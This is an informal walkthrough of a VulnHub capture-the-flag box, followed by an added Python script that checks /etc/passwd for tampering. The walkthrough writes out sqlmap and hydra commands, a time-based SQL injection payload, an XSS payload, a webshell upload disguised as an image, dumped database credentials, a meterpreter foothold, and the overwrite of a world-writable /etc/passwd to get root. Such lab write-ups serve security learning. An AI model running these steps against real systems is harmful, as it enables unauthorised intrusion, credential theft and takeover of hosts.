Please pardon the informality in this post 😛
First did an nmap scan on all ports.
Had 22 and 8008 open.
Browsed to 8008 and had a meme on the front page.
Ran Nikto and found an interesting robots.txt.
Started plugging and chugging until this one gave
Navigated to vulnbank/
At this point it’s been 5 minutes and I’ve made a lot of progress.
I threw a single quote into the username field and got a SQL error back, so I ran sqlmap.
sqlmap seemed to be able to inject into the username field; however, I wasn't able to get any information out of it... I should probably get better at SQL injection.
sqlmap --url http://192.168.1.235:8008/unisxcudkqjydw/vulnbank/client/login.php --data='username=admin'
Next I tried a hydra brute force with the username admin and the rockyou password list.
hydra 192.168.1.235 http-form-post "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid" -l admin -P rockyou.txt -t 32 -w 30 -o hydra_output.txt -s 8008
After struggling with both these tools for a while I decided to run dirb and found two directories. One contained two images, one of them being this meme.
The other directory found was /upload/, which yields a white screen... which I have no idea what to do with...
At this point I'm kinda stuck. Not knowing what to do, I went back to sqlmap. It had a generated payload that started with (username=1' -- ). I plugged that in and didn't get an error... So I started throwing random stuff.
Got stuck and looked at a walkthrough right here. This was the syntax I needed. Which I didn’t even know.
username=1' RLIKE SLEEP(5) -- 
I see the upload function and immediately think webshell
Plugged <script>alert(1)</script> into the problem field and got XSS. Tried uploading my PHP webshell but only image files are allowed. Uploaded the webshell as an image and now I'm going to try to rename it.
Just a heads up: there is no way to remove the stored XSS, so now it's really annoying.
Changed the extension to .jpg and navigated to it. And it still executed... Not exactly sure why.
I looked around; no easy cronjobs or noticeable files. So I decided to see if there are any hardcoded passwords in the website we were trying to SQL-inject.
Sure enough, we found some database passwords
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
I tried to start using mysql interactively but couldn't because my shell isn't good enough.
So I had to pass the queries over the command line with these commands:
mysql -u root -p -e 'Show Tables' bank_database
mysql -u root -p -e 'Select * From klienti' bank_database
Got this back
ID  emer      mbiemer  bilanci  username  password
1   Charles   D. Hobson  25000  hobson    Charles123
    (garbled) Fischer   120000  jeff      jeff321
Tried the jeff user but it doesn’t look like he has anything that Charles didn’t.
Kinda got stuck again. I thought I could do something after finding those creds but couldn't find anything, so I started trying to find ways to escalate privileges. First things first: check /etc/passwd.
This looks like the user I probably need to get to.
Decided to transfer a unix-privesc-check script using Apache and wget.
However, it needed strings to run, so no luck there. No idea how a Linux system doesn't have strings...
Anyway! I ran this one-liner to find world-writable files:
find / -perm -0002 -type f -print -xdev 2>/dev/null
The two files in temp were my uploaded privesc check script.
And it turns out I can write to /etc/passwd. I'm not sure this is a lead, but it's worth looking into.
However, since my shell is so bad, I can't edit it with nano or vi. So I gotta figure out how to upgrade it.
Finally figured out how to generate a msfpayload.
Uploaded it to the target using my apache server and then got a meterpreter session.
Here you can see all my failed payload generations!
So now I needed to add a user with a password to /etc/passwd so I can su. After trying a bunch of things I couldn't get it, so I looked at the walkthrough by G0blin: https://g0blin.co.uk/albania-vulnhub-writeup/.
openssl passwd -1 -salt salt letmein
I couldn't seem to use any text editor, so I created the file on my desktop, uploaded it, and then:
cat passwd > /etc/passwd
Now I have root.
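From the defender's side, the root step above leaves two artifacts that are easy to check for: /etc/passwd being writable by anyone (what the find one-liner turned up) and an entry whose password field carries a hash instead of "x". The script below is an added example, not part of this write-up or the box; the sample passwd content, the placeholder hash and the function names are all constructed here.

```python
import os
import stat
from typing import Dict, List

# Constructed sample, not the box's file: a normal root entry plus a second UID-0
# entry whose password field holds an MD5-crypt style string, i.e. what appending
# an `openssl passwd -1` line to a writable /etc/passwd looks like (hash is a placeholder).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "backdoor:$1$salt$PLACEHOLDERxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash\n"
)
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd(5) lines into dicts; blanks, comments and malformed lines are dropped."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if line.strip() and not line.startswith("#") and len(parts) == 7:
            entries.append(dict(zip(FIELDS, parts)))
    return entries

def audit_entries(entries: List[Dict[str, str]]) -> List[str]:
    """Flag the two signs of the tampering described above."""
    findings = []
    for e in entries:
        name, pw, uid = e["name"], e["passwd"], e["uid"]
        if pw not in ("x", "*", "!", "!!"):   # a hash or empty field belongs in /etc/shadow, never here
            findings.append(f"{name}: password field is '{pw}' instead of 'x'")
        if uid == "0" and name != "root":
            findings.append(f"{name}: extra UID-0 account")
    return findings

def check_mode(path: str = "/etc/passwd") -> List[str]:
    """Report the world/group-writable bits that find -perm -0002 turned up, plus ownership."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: not found"]
    findings = []
    if st.st_mode & (stat.S_IWOTH | stat.S_IWGRP):
        findings.append(f"{path}: writable by non-owner ({stat.filemode(st.st_mode)})")
    if st.st_uid != 0:
        findings.append(f"{path}: not owned by root")
    return findings

if __name__ == "__main__":
    for finding in audit_entries(parse_passwd(SAMPLE_PASSWD)) + check_mode():
        print(finding)
```

Run it against the live file with `audit_entries(parse_passwd(open("/etc/passwd").read()))` to get the same two checks on a real host.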